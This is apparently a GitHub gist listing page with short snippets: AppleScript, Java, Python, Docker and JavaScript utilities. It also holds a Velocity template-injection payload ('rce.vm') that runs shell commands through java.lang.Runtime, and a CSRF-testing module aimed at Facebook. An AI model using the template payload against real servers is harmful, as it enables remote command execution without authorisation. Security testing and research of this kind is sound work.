Skip to content

Instantly share code, notes, and snippets.

Avatar
👀
Open to new opportunities

Glenn 'devalias' Grant 0xdevalias

👀
Open to new opportunities
View GitHub Profile
View WebsiteAgentChain.json
{
"name": "Website Agents",
"description": "No description provided",
"source_url": false,
"guid": "bc515f995bae4e9e03c8facb03802ba3",
"exported_at": "2014-06-22T07:33:58Z",
"agents": [
{
"type": "Agents::WebsiteAgent",
"name": "WebsiteAgent 1",
@0xdevalias
0xdevalias / my-opinionated-typesafe-stack.md
Last active Aug 29, 2015
My Opinionated Typesafe Stack
View my-opinionated-typesafe-stack.md
View spotifyInfo
tell application "Spotify"
set myTrack to name of current track
set myArtist to artist of current track
set myAlbum to album of current track
set tM to round ((duration of current track) / 60) rounding down
set tS to (duration of current track) mod 60
set myTime to ((tM as text) & "min " & tS as text) & "s"
set nM to round (player position / 60) rounding down
set nS to round (player position mod 60) rounding down
set nowAt to ((nM as text) & "min " & nS as text) & "s"
@miiCard
miiCard / ZeroContentLengthFixListener.java
Last active Dec 20, 2015
Works around an issue in Signpost that causes the Content-Length header not to be set
View ZeroContentLengthFixListener.java
import java.net.HttpURLConnection;
import oauth.signpost.OAuthProviderListener;
import oauth.signpost.http.HttpRequest;
import oauth.signpost.http.HttpResponse;
public class ZeroContentLengthFixListener implements OAuthProviderListener {
public void prepareRequest(HttpRequest request) throws Exception {
HttpURLConnection connection = (HttpURLConnection) request.unwrap();
connection.setFixedLengthStreamingMode(0);
View decode-illegal-prime.py
#!/bin/python3
fr = open("prime.txt")
s = fr.read(2000)
s = s.replace("\n","").replace(" ","")
i = int(s)
fw = open("prime.gz","wb")
View docker_container_size.md

Using the following Dockerfile:

FROM alpine:3.2

RUN apk update
RUN apk add gcc
RUN apk del --purge gcc

ENTRYPOINT ["sh"]
@h3xstream
h3xstream / rce.vm
Last active Jun 6, 2017
RCE in velocity template when no extension enable
View rce.vm
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('ls'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
@debasishm89
debasishm89 / fbxsrf.py
Last active Jul 24, 2017
This Burpy (https://github.com/debasishm89/burpy) module is specially written to find CSRF vulnerability in Facebook Application.
View fbxsrf.py
from rawweb import *
def main(raw_stream,ssl):
'''
This Burpy module is specially written to find CSRF vulnerability in Facebook Application.
It has already found few minor CSRF vulnerability in FB application. Few them was qualifed for Bug Bounty.
It simply checks whether CSRF token validation is present in Server Side or not by removing token
from request and replaying it.Facebook application always throws a generic error message for CSRF error which is
"Please try closing and re-opening your browser". If this error is not present in response after removing the token
it returns +ve.
'''
@RByers
RByers / Logging programattic scrolls
Last active Aug 15, 2017 — forked from majido/detectProgrammaticScroll.js
Script to be pasted into developer tools to log calls to programmatic scrolling APIs. Currently tested just on Chrome and Firefox.
View Logging programattic scrolls
(function(){
// Override function in given prototype to add a log statement
function logMethod(prototype, fname) {
var name = prototype.constructor.name + '.' + fname;
if (!(fname in prototype)) {
console.warn("Warning: can't instrument " + name);
return;
}
console.log("Instrumenting " + name);
var original = prototype[fname];
View Dockerfile
FROM alexellis2/faas-alpinefunction:latest
RUN apk update && apk add nmap
ENV fprocess="xargs nmap"
CMD ["fwatchdog"]